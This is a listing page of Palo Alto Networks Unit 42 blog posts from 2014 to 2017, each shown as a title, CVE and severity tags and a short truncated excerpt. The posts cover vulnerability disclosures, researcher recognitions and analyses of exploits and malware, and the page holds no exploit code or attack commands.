Published: August 7, 2017
Threat Research
Vulnerabilities
Black Hat
Bounty Program Top 100
Microsoft
Microsoft Security Response Center (MSRC)
Every year at Black Hat, Microsoft publishes the Microsoft Security Response Center (MSRC) Bounty Program Top 100, a list of the top contributors to the company’s vulnerabilities disclosure program. This year, five Palo Alto Networks threat intelligence researchers were recognized at Black Hat USA 2017 for their contributions to preventing security incidents and advancing Microsoft product security. Congratulations to Bo Qu, Tao Yan, Hui Gao, Tongbo Luo, and Jin Chen!
Palo Alto Networks is a regular contributor to vulnerability research in Microsoft, Adob
Unit42
Palo Alto Networks Unit 42 Vulnerability Research May 2017 Disclosures
blogs_unit42·2017-06-01·CVSS 7.8
CVE-2017-0264 [HIGH] Palo Alto Networks Unit 42 Vulnerability Research May 2017 Disclosures
## Palo Alto Networks Unit 42 Vulnerability Research May 2017 Disclosures
Unit 42
Published: June 1, 2017
Threat Research
Vulnerabilities
Adobe Flash
As part of Unit 42’s ongoing threat research, we can now disclose that Palo Alto Networks Unit 42 researchers have discovered two code execution vulnerabilities affecting Microsoft Office that were addressed in Microsoft’s May 2017 monthly security update release:
CVE-2017-0264 : Jin Chen
CVE-2017-0265 : Jin Chen
For current customers with a Threat Prevention subscription, Palo Alto Networks has also released IPS signatures providing proactive protection from these vulnerabilities. Traps, Palo Alto Networks advanced endpoint solution, can block memory corruption based exploits of this nature.
Palo Alto Networks is a regular contrib
Unit42
A Dissection of the “EsteemAudit” Windows Remote Desktop Exploit
blogs_unit42·2017-05-31·CVSS 8.1
CVE-2017-9073 [HIGH] A Dissection of the “EsteemAudit” Windows Remote Desktop Exploit
## A Dissection of the “EsteemAudit” Windows Remote Desktop Exploit
Tao Yan
Published: May 31, 2017
Threat Research
Vulnerabilities
CVE-2017-9073
EsteemAudit
ETERNALBLUE
## Summary
In April, a group known as the “Shadow Brokers” released a cache of stolen information that included multiple tools to exploit vulnerabilities in various versions of Microsoft Windows. The most famous of these is an exploit tool called “EternalBlue” which was repurposed to spread the WanaCrypt0r ransomware/worm earlier this month. Another tool released in this dump is “EsteemAudit”, which exploits CVE-2017-9073, a vulnerability in the Windows Remote Desktop system on Windows XP and Windows Server 2003. Both versions of this operating system are no longer supported by Microsoft (XP ended in 2014, Se
Unit42
Palo Alto Networks Unit 42 Vulnerability Research March 2017 Disclosures
blogs_unit42·2017-03-16·CVSS 8.8
CVE-2017-2997 [HIGH] Palo Alto Networks Unit 42 Vulnerability Research March 2017 Disclosures
Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Unit 42 Vulnerability Research March 2017 Disclosures
Unit 42
Published: March 16, 2017
Threat Research
Vulnerabilities
Adobe Flash
As part of Unit 42’s ongoing threat research, we can now disclose that Palo Alto Networks Unit 42 researchers have discovered three code execution vulnerabilities affecting Adobe Flash (APSB17-07) that were addressed in Adobe’s monthly security update release:
CVE-2017-2997 : Tao Yan
CVE-2017-2998 : Tao Yan
CVE-2017-2999 : Tao Yan
For current customers with a Threat Prevention subscription, Palo Alto Networks has also released IPS signatures providing proactive protection from these vulnerabilities. Traps, Palo Alto Networks advanced endpoint solution, can block memor
Unit42
Palo Alto Networks Unit 42 Vulnerability Research February 2017 Disclosures
blogs_unit42·2017-03-03·CVSS 8.8
CVE-2017-2982 [HIGH] Palo Alto Networks Unit 42 Vulnerability Research February 2017 Disclosures
Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Unit 42 Vulnerability Research February 2017 Disclosures
Unit 42
Published: March 3, 2017
Threat Research
Vulnerabilities
Adobe Flash
As part of Unit 42’s ongoing threat research, we can now disclose that Palo Alto Networks Unit 42 researchers have discovered two code execution vulnerabilities affecting Adobe Flash (APSB17-04) that were addressed in Adobe’s monthly security update release:
CVE-2017-2982: Tao Yan
CVE-2017-2996: Tao Yan
For current customers with a Threat Prevention subscription, Palo Alto Networks has also released IPS signatures providing proactive protection from these vulnerabilities. Traps, Palo Alto Networks advanced endpoint solution, can block memory corruption based exploits
Unit42
Palo Alto Networks Unit 42 Vulnerability Research December 2016 Disclosures
blogs_unit42·2016-12-16·CVSS 7.8
[HIGH] Palo Alto Networks Unit 42 Vulnerability Research December 2016 Disclosures
Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Unit 42 Vulnerability Research December 2016 Disclosures
Unit 42
Published: December 16, 2016
Threat Research
Vulnerabilities
Adobe Flash
ICloud
ITunes
Microsoft Office
Safari
As part of Unit 42’s ongoing threat research, we can now disclose that Palo Alto Networks Unit 42 researchers have reported six vulnerabilities that have been fixed by Apple, Adobe and Microsoft.
This includes two vulnerabilities in Apple WebKit and impacts iCloud for Windows, Safari, iTunes for Windows, tvOS and iOS.
CVE-2016-7639: Tongbo Luo
CVE-2016-7642: Tongbo Luo
This includes three code execution vulnerabilities affecting Adobe Flash (APSB16-39) .
CVE-2016-7873: Tao Yan
CVE-2016-7874: Tao Yan
CVE-2016-7871: T
Unit42
Palo Alto Networks Researcher Discovers Four Critical Vulnerabilities in Adobe Flash Player
blogs_unit42·2016-10-20·CVSS 8.8
CVE-2016-6982 [HIGH] Palo Alto Networks Researcher Discovers Four Critical Vulnerabilities in Adobe Flash Player
Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Researcher Discovers Four Critical Vulnerabilities in Adobe Flash Player
Ryan Olson
Published: October 20, 2016
Threat Research
Vulnerabilities
Adobe
Adobe Flash Player
Palo Alto Networks was recently credited with the discovery of four new vulnerabilities affecting Adobe Flash Player.
Researcher Tao Yan discovered critical vulnerabilities CVE-2016-6982, CVE-2016-6983, CVE-2016-6984, CVE-2016-6985 affecting Adobe Flash Player. Descriptions of each, as well as details on affected versions and products, are included in the Adobe Security Bulletin. Adobe has released security updates for Adobe Flash Player.
For current customers with a Threat Prevention subscription, Palo Alto Networks has also release
Unit42
Palo Alto Networks Discovers Two Adobe Reader Privileged JavaScript Zero-Days
blogs_unit42·2016-10-17·CVSS 9.8
CVE-2016-6957 [CRITICAL] Palo Alto Networks Discovers Two Adobe Reader Privileged JavaScript Zero-Days
Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Discovers Two Adobe Reader Privileged JavaScript Zero-Days
Gal De Leon
Published: October 17, 2016
Threat Research
Vulnerabilities
Adobe
Adobe Reader
We recently discovered two zero-day vulnerabilities in Adobe Reader. Adobe has since released a patch (on October 6, 2016) to fix these vulnerabilities, which are named CVE-2016-6957 and CVE-2016-6958. These vulnerabilities could allow an attacker to compromise Adobe Reader by bypassing restrictions on JavaScript API execution (CVE-2016-6957) and security provisions that prevent arbitrary execution of scripts such as those written in Python (CVE-2016-6958). In this blog post, I will provide a technical walkthrough of these vulnerabilities, how they can be
Unit42
Palo Alto Networks Researcher Discovers Eight Critical Vulnerabilities in Adobe Flash Player
blogs_unit42·2016-09-19·CVSS 8.8
CVE-2016-4182 [HIGH] Palo Alto Networks Researcher Discovers Eight Critical Vulnerabilities in Adobe Flash Player
Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Researcher Discovers Eight Critical Vulnerabilities in Adobe Flash Player
Ryan Olson
Published: September 19, 2016
Threat Research
Vulnerabilities
Adobe
Adobe Flash
Palo Alto Networks was recently credited with the discovery of eight new vulnerabilities affecting Adobe Flash Player.
Researcher Tao Yan discovered critical vulnerabilities CVE-2016-4182, CVE-2016-4237, CVE-2016-4238, CVE-2016-4281, CVE-2016-4282, CVE-2016-4283, CVE-2016-4284, and CVE-2016-4285 affecting Adobe Flash Player. Descriptions of each, as well as details on affected versions and products, are included in the following Adobe Security Bulletins:
Adobe Security Bulletin – August 26, 2016
Adobe Security Bulletin – September 13, 20
Unit42
Unit 42 Researchers Recognized in MSRC Top 100 List
blogs_unit42·2016-08-16·CVSS 6.5
[MEDIUM] Unit 42 Researchers Recognized in MSRC Top 100 List
Threat Research Center
Threat Research
Vulnerabilities
## Unit 42 Researchers Recognized in MSRC Top 100 List
Ryan Olson
Published: August 16, 2016
Threat Research
Vulnerabilities
Black Hat
Bounty Program Top 100
Microsoft
Microsoft Security Response Center (MSRC)
Four Palo Alto Networks threat intelligence researchers were recently recognized in the Microsoft Security Response Center (MSRC) Bounty Program Top 100 list announced at Black Hat USA 2016. Congratulations to Bo Qu, Tao Yan, Hui Gao, and Tongbo Luo!
Palo Alto Networks is a regular contributor to vulnerability research in Microsoft, Apple, Android and other ecosystems. By proactively identifying vulnerabilities, developing protections for our customers, and sharing them with Microsoft for patching, we are removing
Unit42
Palo Alto Networks Researchers Discover Critical Safari 9.1 Vulnerability
blogs_unit42·2016-07-27·CVSS 8.8
CVE-2016-4589 [HIGH] Palo Alto Networks Researchers Discover Critical Safari 9.1 Vulnerability
Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Researchers Discover Critical Safari 9.1 Vulnerability
Ryan Olson
Published: July 27, 2016
Threat Research
Vulnerabilities
Apple
CVE-2016-4589
IPad 2
IPhone 4S
IPod Touch
Safari
WebKit
Palo Alto Networks researchers were recently credited with the discovery of an Apple product vulnerability.
Researchers Tongbo Luo and Bo Qu discovered a WebKit vulnerability (CVE-2016-4589) affecting Safari in Apple iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later, and Apple TV (4th generation).
Apple addressed both findings in recent security updates (HT206902 and HT206905); they are resolved in iOS 9.3.3 and tvOS 9.2.2. Palo Alto Networks also released IPS signatures covering these
Unit42
Palo Alto Networks Researchers Discover Two Critical Internet Explorer Vulnerabilities
blogs_unit42·2016-07-13·CVSS 6.5
[MEDIUM] Palo Alto Networks Researchers Discover Two Critical Internet Explorer Vulnerabilities
Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Researchers Discover Two Critical Internet Explorer Vulnerabilities
Ryan Olson
Published: July 13, 2016
Threat Research
Vulnerabilities
Internet Explorer
Microsoft
Microsoft Security Bulletin
Palo Alto Networks researchers discovered two new critical Internet Explorer (IE) vulnerabilities affecting IE versions 9, 10, and 11. Both are included in Microsoft’s July 2016 Security Bulletin, and documented in Microsoft Security Bulletin MS16-084.
In our continued commitment to the security research community, these vulnerabilities were disclosed to Microsoft through our participation in the Microsoft Active Protections Program (MAPP) program, which ensures the timely, responsible disclosure of new vulnera
Unit42
Recent MNKit Exploit Activity Reveals Some Common Threads
blogs_unit42·2016-06-30·CVSS 8.8
CVE-2012-0158 [HIGH] Recent MNKit Exploit Activity Reveals Some Common Threads
Threat Research Center
Threat Research
Malware
## Recent MNKit Exploit Activity Reveals Some Common Threads
Anthony Kasza
Published: June 30, 2016
Malware
Threat Research
Vulnerabilities
CVE-2012-0158
LURKo Ghost
MNKit
NetTraveler
Payload
Saker
Unit 42 recently identified a variant of MNKit-weaponized documents being used to deliver LURK0 Gh0st, NetTraveler, and Saker payloads. The documents were delivered to targets involved with universities, NGOs, and political/human rights groups concerning Islam and South Asia. Reuse of this MNKit variant, sender email addresses, email subject lines, attachment filenames, command and control domains, XOR keys, and targeted recipients show a connection between the different payload families delivered.
MNKit is the name given to a buil
Unit42
Palo Alto Networks Researchers Uncover Critical Apple Product Vulnerabilities
blogs_unit42·2016-06-02·CVSS 8.8
CVE-2016-1855 [HIGH] Palo Alto Networks Researchers Uncover Critical Apple Product Vulnerabilities
Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Researchers Uncover Critical Apple Product Vulnerabilities
Ryan Olson
Published: June 2, 2016
Threat Research
Vulnerabilities
Apple
Apple TV
IPad 2
IPhone 4S
IPod Touch
Palo Alto Networks researchers were recently credited with discovery of two new Apple product vulnerabilities.
Researchers Tongbo Luo and Bo Qu discovered a WebKit vulnerability (CVE-2016-1855) affecting Safari in OS X Mavericks v10.9.5, OS X Yosemite v10.10.5 and OS X El Capitan v10.11.5.
Tongbo and Bo also identified an OpenGL vulnerability (CVE-2016-1847) affecting Apple TV (fourth generation and later), iPhone 4S (and later versions), iPod Touch (fifth generation and later), and iPad 2 (and later versions).
Apple addressed bot
Unit42
Palo Alto Networks Researchers Discover Critical IE Vulnerabilities
blogs_unit42·2016-03-25·CVSS 6.5
[MEDIUM] Palo Alto Networks Researchers Discover Critical IE Vulnerabilities
Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Researchers Discover Critical IE Vulnerabilities
Ryan Olson
Published: March 25, 2016
Threat Research
Vulnerabilities
Internet Explorer
Microsoft
Palo Alto Networks researchers Tongbo Luo and Hui Gao were credited with the discoveries of new critical Microsoft vulnerabilities affecting Internet Explorer (IE) versions 7, 8, 9, 10 and 11 on affected Windows clients. These vulnerabilities are documented in Microsoft Security Bulletins MS15-106 and MS15-112.
In our continued commitment to the security research community, these vulnerabilities were disclosed to Microsoft through our participation in the Microsoft Active Protections Program (MAPP) program, which ensures the timely, responsible disclosure of
Unit42
AceDeceiver: First iOS Trojan Exploiting Apple DRM Design Flaws to Infect Any iOS Device
blogs_unit42·2016-03-16
AceDeceiver: First iOS Trojan Exploiting Apple DRM Design Flaws to Infect Any iOS Device
Threat Research Center
Threat Research
Vulnerabilities
## AceDeceiver: First iOS Trojan Exploiting Apple DRM Design Flaws to Infect Any iOS Device
Claud Xiao
Published: March 16, 2016
Threat Research
Vulnerabilities
AceDeceiver
FairPlay
OS X
Trojan
ZergHelper
We’ve discovered a new family of iOS malware that successfully infected non-jailbroken devices we’ve named “AceDeceiver”.
What makes AceDeceiver different from previous iOS malware is that instead of abusing enterprise certificates as some iOS malware has over the past two years, AceDeceiver manages to install itself without any enterprise certificate at all. It does so by exploiting design flaws in Apple’s DRM mechanism, and even as Apple has removed AceDeceiver from App Store, it may still spread thanks to a novel at
Unit42
Palo Alto Networks Researcher Discovers Critical IE Vulnerability
blogs_unit42·2016-03-09·CVSS 6.5
[MEDIUM] Palo Alto Networks Researcher Discovers Critical IE Vulnerability
Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Researcher Discovers Critical IE Vulnerability
Ryan Olson
Published: March 9, 2016
Threat Research
Vulnerabilities
Internet Explorer
Microsoft
Microsoft Security Bulletin
Palo Alto Networks researcher Hui Gao was credited with the discovery of a new critical Microsoft vulnerability affecting Internet Explorer (IE) versions 9, 10 and 11. This vulnerability is covered in Microsoft’s March 2016 Security Bulletin and documented in Microsoft Security Bulletin MS16-023.
In our continued commitment to the security research community, these vulnerabilities were disclosed to Microsoft through our participation in the Microsoft Active Protections Program (MAPP) program, which ensures the timely, responsible d
Unit42
Palo Alto Networks Researcher Discovers Critical Vulnerabilities in Adobe Flash
blogs_unit42·2016-01-05·CVSS 10.0
CVE-2015-8443 [CRITICAL] Palo Alto Networks Researcher Discovers Critical Vulnerabilities in Adobe Flash
Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Researcher Discovers Critical Vulnerabilities in Adobe Flash
Ryan Olson
Published: January 5, 2016
Threat Research
Vulnerabilities
Adobe
Adobe Flash Player
Palo Alto Networks was recently credited with discovery of two new vulnerabilities affecting Adobe Flash Player.
Researcher Hui Gao discovered critical vulnerabilities CVE-2015-8443 and CVE-2015-8444. Descriptions of each, as well as details on affected versions and products, are included in an Adobe Security Bulletin dated December 8, 2015. Adobe has released security updates for Adobe Flash Player.
Palo Alto Networks is an active contributor to vulnerability research, including regular discoveries of critical vulnerabilities affecting Adobe Fla
Unit42
Palo Alto Networks Researchers Discover Critical Vulnerabilities in Internet Explorer and Microsoft Edge
blogs_unit42·2015-12-10·CVSS 6.5
[MEDIUM] Palo Alto Networks Researchers Discover Critical Vulnerabilities in Internet Explorer and Microsoft Edge
## Palo Alto Networks Researchers Discover Critical Vulnerabilities in Internet Explorer and Microsoft Edge
Ryan Olson
Published: December 10, 2015
Threat Research
Vulnerabilities
Internet Explorer
Microsoft edge
Microsoft Security Bulletin
Palo Alto Networks researchers Bo Qu and Hui Gao were credited with the discovery of three new critical Microsoft vulnerabilities affecting Internet Explorer (IE) versions 7, 8, 9, 10 and 11 and Microsoft Edge. These vulnerabilities are covered in Microsoft’s December 2015 Security Bulletin and documented in Microsoft Security Bulletins MS15-125 and MS15-124.
In our continuing commitment to the security research community, these vulnerabilities were disclosed to Microsoft through our participation in the Microsoft Active Protections Program (
Unit42
Palo Alto Networks Researchers Discover High Severity Vulnerability Impacting Apple’s Major Products
blogs_unit42·2015-12-09·CVSS 6.8
CVE-2015-7066 [MEDIUM] Palo Alto Networks Researchers Discover High Severity Vulnerability Impacting Apple’s Major Products
## Palo Alto Networks Researchers Discover High Severity Vulnerability Impacting Apple’s Major Products
Ryan Olson
Published: December 9, 2015
Threat Research
Vulnerabilities
Apple
Apple TV
Apple Watch
IPad
IPhone
IPod
OS X
Palo Alto Networks researchers Tongbo Luo and Bo Qu are credited with discovering a new vulnerability (CVE-2015-7066) in OpenGL and Webkit that impacts all of Apple’s major products, including:
iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later
Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes
OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, OS X El Capitan v10.11 and v10.11.1
Apple TV (4th generation)
CVE-2015-7066 is a memory corruption issue that can lead to remote code execution when a user views a
Unit42
Palo Alto Networks Researcher Discovers Critical Vulnerabilities in Internet Explorer and Microsoft Edge
blogs_unit42·2015-11-11·CVSS 9.8
[CRITICAL] Palo Alto Networks Researcher Discovers Critical Vulnerabilities in Internet Explorer and Microsoft Edge
Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Researcher Discovers Critical Vulnerabilities in Internet Explorer and Microsoft Edge
Ryan Olson
Published: November 11, 2015
Threat Research
Vulnerabilities
Internet Explorer
Microsoft edge
Microsoft Security Bulletin
Palo Alto Networks researcher Bo Qu was credited with discovery of six new critical Microsoft vulnerabilities affecting Internet Explorer (IE) versions 7, 8, 9, 10 and 11 and Microsoft Edge. These vulnerabilities are covered in Microsoft’s November 2015 Security Bulletin and documented in Microsoft Security Bulletins MS15-112 and MS15-113.
In our continuing commitment to the security research community, these vulnerabilities were disclosed to Microsoft through our participation in the
Unit42
Palo Alto Networks Researcher Discovers Critical IE Vulnerability
blogs_unit42·2015-10-27·CVSS 9.3
CVE-2015-2548 [CRITICAL] Palo Alto Networks Researcher Discovers Critical IE Vulnerability
## Palo Alto Networks Researcher Discovers Critical IE Vulnerability
Ryan Olson
Published: October 27, 2015
Threat Research
Vulnerabilities
Internet Explorer
Microsoft
Microsoft Security Bulletin
Palo Alto Networks researcher Hui Gao was credited with discovery of a new critical Internet Explorer (IE) vulnerability affecting IE versions 6, 7, 8, 9, 10 and 11. CVE-2015-2548 is included in Microsoft's October 2015 Security Bulletin and documented in Microsoft Security Bulletin MS15-109.
In our continuing commitment to the security research community, these vulnerabilities were disclosed to Microsoft through our participation in the Microsoft Active Protections Program (MAPP) program, which ensures the timely, responsible disclosure of new vulnerabilities and creation of protection
Unit42
Palo Alto Networks Researchers Discover Critical Vulnerabilities in Internet Explorer and Adobe Shockwave Player
blogs_unit42·2015-09-09·CVSS 9.9
[CRITICAL] Palo Alto Networks Researchers Discover Critical Vulnerabilities in Internet Explorer and Adobe Shockwave Player
Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Researchers Discover Critical Vulnerabilities in Internet Explorer and Adobe Shockwave Player
Ryan Olson
Published: September 9, 2015
Threat Research
Vulnerabilities
Adobe
Adobe Shockwave Player
Internet Explorer
Microsoft
Microsoft Security Bulletin
Palo Alto Networks researchers have been credited with discovery of new vulnerabilities affecting Adobe Shockwave Player and Microsoft Internet Explorer.
Palo Alto Networks researcher Tongbo Luo discovered a critical vulnerability in Adobe Shockwave Player affecting Shockwave versions 12.1.9.160 and earlier for Windows. The vulnerability and upgrade instructions are detailed by Adobe in a Security Bulletin dated September 8, 2015.
Palo Alto Networks
Unit42
UPS: Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload
blogs_unit42·2015-07-27·CVSS 9.8
CVE-2015-3113 [CRITICAL] UPS: Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload
## UPS: Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload
Robert Falcone
Richard Wartell
Published: July 27, 2015
Threat Research
Vulnerabilities
ActionScript
Adobe Flash
APT3
Internet Explorer
Operation Clandestine Wolf
Pirpi
Shellcode
Steganography
UPS
Zero-days
A June 23 FireEye blog post titled “Operation Clandestine Wolf” discussed a cyber espionage group, known as APT3, that had been exploiting a zero-day vulnerability in Adobe Flash. Unit 42 also tracks the APT3 group using the name UPS, which is an intrusion set with Chinese origins that is known for having early access to zero-day vulnerabilities and delivering a backdoor called Pirpi.
The UPS group has exploited several zero-day vulnerabilities, most recently using the zero-days released in th
Unit42
Palo Alto Networks Researcher Discovers Two Critical Internet Explorer Vulnerabilities
blogs_unit42·2015-07-16·CVSS 6.5
[MEDIUM] Palo Alto Networks Researcher Discovers Two Critical Internet Explorer Vulnerabilities
Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Researcher Discovers Two Critical Internet Explorer Vulnerabilities
Ryan Olson
Published: July 16, 2015
Threat Research
Vulnerabilities
Internet Explorer
Microsoft
Microsoft Security Bulletin
Palo Alto Networks researcher Bo Qu discovered two new critical Internet Explorer (IE) vulnerabilities affecting IE versions 6, 7, 8, 9, 10, and 11. Both are included in Microsoft’s July 2015 Security Bulletin, and documented in Microsoft Security Bulletins MS15-065 and MS15-066.
In our continuing commitment to the security research community, these vulnerabilities were disclosed to Microsoft through our participation in the Microsoft Active Protections Program (MAPP) program, which ensures the timely, respons
Unit42
Palo Alto Networks Researcher Discovers 3 Critical Internet Explorer Vulnerabilities
blogs_unit42·2015-06-09·CVSS 6.5
[MEDIUM] Palo Alto Networks Researcher Discovers 3 Critical Internet Explorer Vulnerabilities
Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Researcher Discovers 3 Critical Internet Explorer Vulnerabilities
Ryan Olson
Published: June 9, 2015
Threat Research
Vulnerabilities
Internet Explorer
Microsoft
Microsoft Security Bulletin
Palo Alto Networks researcher Bo Qu discovered three new critical Internet Explorer (IE) vulnerabilities affecting IE versions 6, 7, 8, 9, 10 and 11. All three are included in Microsoft’s June 2015 Security Bulletin, and documented in Microsoft Security Bulletin MS15-056.
In our continuing commitment to the security research community, these vulnerabilities were disclosed to Microsoft through our participation in the Microsoft Active Protections Program (MAPP) program, which ensures the timely, responsible disclo
Unit42
Understanding Flash Exploitation and the Alleged CVE-2015-0359 Exploit
blogs_unit42·2015-06-01·CVSS 9.8
CVE-2015-0359 [CRITICAL] Understanding Flash Exploitation and the Alleged CVE-2015-0359 Exploit
## Understanding Flash Exploitation and the Alleged CVE-2015-0359 Exploit
Palo Alto Networks
Published: June 1, 2015
Threat Research
Vulnerabilities
Adobe Flash Player
Angler Exploit
ByteArray
ByteArrayObject
Flash
What follows is a detailed analysis of the root cause of a vulnerability we call CVE-2015-X, as well as a step-by-step explanation of how to trigger it. For more on Flash vulnerabilities, we also invite you to read “The Latest UAF Vulnerabilities in Exploit Kits,” published May 28 by Tao Yan.
Not too long ago we came across a sample from the Angler Exploit Kit (MD5: 049ff69bc23f36a78d86bbf1356c2f63c), which allegedly exploits CVE-2015-0359. The obfuscated SWF contains an encoded SWF (MD5: d45808cfa6f3cbfb3
Unit42
The Latest Flash UAF Vulnerabilities in Exploit Kits
blogs_unit42·2015-05-28
The Latest Flash UAF Vulnerabilities in Exploit Kits
## The Latest Flash UAF Vulnerabilities in Exploit Kits
Tao Yan
Published: May 28, 2015
Threat Research
Vulnerabilities
Adobe Flash
ByteArray
Flash UAF
## Introduction
Recently, several popular exploit kits, including Angler, Flash EK, SweetOrange, Fiesta and Neutrino [1], have added several use-after-free (UAF) vulnerabilities in Adobe Flash to exploit victims’ browsers. Previously, these exploit kits typically used out-of-bounds access (OBA) vulnerabilities in Adobe Flash, as those can be exploited universally and stably [2] and require less effort to exploit than UAF vulnerabilities. In order to detect these newly added UAF vulnerabilities, we analyzed the code found in the exploit kits to determine which vulnerabilities are present and how
Unit42
Palo Alto Networks Researcher Discovers 3 Critical Internet Explorer Vulnerabilities
blogs_unit42·2015-05-12·CVSS 6.5
[MEDIUM] Palo Alto Networks Researcher Discovers 3 Critical Internet Explorer Vulnerabilities
## Palo Alto Networks Researcher Discovers 3 Critical Internet Explorer Vulnerabilities
Ryan Olson
Published: May 12, 2015
Threat Research
Vulnerabilities
Internet Explorer
Microsoft
Microsoft Security Bulletin
Palo Alto Networks researcher Bo Qu discovered three new critical Internet Explorer (IE) vulnerabilities affecting IE versions 8, 9, 10 and 11. All three are included in Microsoft’s May 2015 Security Bulletin and documented in Microsoft Security Bulletin MS15-043.
In our continuing commitment to the security research community, these vulnerabilities were disclosed to Microsoft through our participation in the Microsoft Active Protections Program (MAPP), which ensures the timely, responsible disclosure of new vulnerabilities and creation of protections from secur
Unit42
Android Installer Hijacking Vulnerability Could Expose Android Users to Malware
blogs_unit42·2015-03-24
Android Installer Hijacking Vulnerability Could Expose Android Users to Malware
## Android Installer Hijacking Vulnerability Could Expose Android Users to Malware
Zhi Xu
Published: March 24, 2015
Malware
Threat Research
Vulnerabilities
Android
Android Installer Hijacking
Google
Mobility
## Executive Summary
We discovered a widespread vulnerability in Google’s Android OS we are calling “Android Installer Hijacking,” estimated to impact 49.5 percent of all current Android users. In detail:
- Android Installer Hijacking allows an attacker to modify or replace a seemingly benign Android app with malware, without user knowledge. This only affects applications downloaded from third-party app stores.
- The malicious application can gain full access to a compromised device, including usernames, passwords,
Unit42
Palo Alto Networks Researcher Identifies Critical Internet Explorer Vulnerability
blogs_unit42·2015-03-10·CVSS 6.5
[MEDIUM] Palo Alto Networks Researcher Identifies Critical Internet Explorer Vulnerability
## Palo Alto Networks Researcher Identifies Critical Internet Explorer Vulnerability
Ryan Olson
Published: March 10, 2015
Threat Research
Vulnerabilities
Internet Explorer
Microsoft
Microsoft Security Bulletin
Palo Alto Networks researcher Bo Qu discovered a new critical Internet Explorer (IE) vulnerability affecting IE versions 8, 9, 10 and 11. It is included in Microsoft’s March 2015 Security Bulletins MS15-018 and MS15-019, and documented in Microsoft Security Bulletin MS15-MAR.
As part of our continuing commitment to the security research community, this vulnerability was disclosed to Microsoft through our participation in the Microsoft Active Protections Program (MAPP), which ensures the timely, responsible di
Unit42
Palo Alto Networks Researcher Identifies 3 Critical Internet Explorer Vulnerabilities
blogs_unit42·2015-02-10·CVSS 6.5
[MEDIUM] Palo Alto Networks Researcher Identifies 3 Critical Internet Explorer Vulnerabilities
## Palo Alto Networks Researcher Identifies 3 Critical Internet Explorer Vulnerabilities
Ryan Olson
Published: February 10, 2015
Threat Research
Vulnerabilities
Internet Explorer
Microsoft
Microsoft Security Bulletin
Palo Alto Networks researcher Bo Qu discovered three new critical Internet Explorer (IE) vulnerabilities affecting IE versions 9, 10 and 11. All three are included in Microsoft's February 2015 Security Bulletin MS15-009 and documented in Microsoft Security Bulletin MS15-FEB.
As part of our continuing commitment to the security research community, these vulnerabilities were disclosed to Microsoft through our participation in the Microsoft Active Protections Program (MAPP), which ensures the timely, responsibl
Unit42
Watch Our Researchers Cover Predicting Malicious Domains at VB2014
blogs_unit42·2015-02-09·CVSS 6.5
[MEDIUM] Watch Our Researchers Cover Predicting Malicious Domains at VB2014
## Watch Our Researchers Cover Predicting Malicious Domains at VB2014
Palo Alto Networks
Published: February 9, 2015
Threat Research
Vulnerabilities
VB2014
Virus Bulletin International Conference
Malicious domains are commonly used by cyberattackers for command and control communication, hosting malware and phishing attacks. Palo Alto Networks researchers Wei Xu, Kyle Sanders and Yanxin Zhang recently explored ways to predict malicious domains so they can be added to blacklists before they go live. To hear how they went about this, and to see the results they achieved, take a look at this video from their paper presentation at VB2014:
Unit42
Google Chrome Exploitation – A Case Study
blogs_unit42·2014-12-15
Google Chrome Exploitation – A Case Study
## Google Chrome Exploitation – A Case Study
Palo Alto Networks
Published: December 14, 2014
Threat Research
Vulnerabilities
Exploitation
Google Chrome
In this write-up, we will present several techniques used in exploiting a vulnerability in Google Chrome, and the various difficulties presented by its security mechanisms and considerations. We also offer some reflections regarding how some of the techniques used were made irrelevant by mitigations introduced since.
The exploit was developed for a bug in Chrome 33, a winning submission to Pwn2Own 2014 by geohot, which later also earned him the Pwnie Award for Best Client-Side Bug.
## The Bug
The vulnerability existed in Chrome's implementation of ArrayBuffers, and is described in some detail in this issue page in the Chrom
Unit42
DTLS Vulnerabilities in CVE-2014-6321
blogs_unit42·2014-12-10·CVSS 10.0
CVE-2014-6321 [CRITICAL] DTLS Vulnerabilities in CVE-2014-6321
## DTLS Vulnerabilities in CVE-2014-6321
Jin Chen
Shengming Xu
Published: December 10, 2014
Threat Research
Vulnerabilities
CVE-2014-6321
Datagram Transport Layer Security
DTLS
Microsoft Remote Desktop Protocol
Microsoft Security Bulletin
Microsoft Windows
MS14-066
Remote Desktop Gateway
Schannel
Microsoft recently released a patch for a critical vulnerability in Microsoft Secure Channel (aka Schannel), addressed in bulletin MS14-066. The patch for CVE-2014-6321 fixed many areas within schannel.dll, including at least two vulnerabilities related to the handling of the Datagram Transport Layer Security (DTLS) protocol.
DTLS is used by Microsoft Remote Desktop Protocol (RDP) to provide communications privacy for datagram protocols. The DTLS proto
Unit42
Code to Trigger MS14-066 ECDSA Server BOF Vulnerability
blogs_unit42·2014-12-04
Code to Trigger MS14-066 ECDSA Server BOF Vulnerability
## Code to Trigger MS14-066 ECDSA Server BOF Vulnerability
IPS Team
Published: December 4, 2014
Threat Research
Vulnerabilities
BOF
Buffer Overflow
Microsoft Secure Channel
Microsoft Security Bulletin
MS14-066
OpenSSL
Schannel
Microsoft recently released a patch for a critical vulnerability in Microsoft Secure Channel (aka Schannel), addressed in bulletin MS14-066.
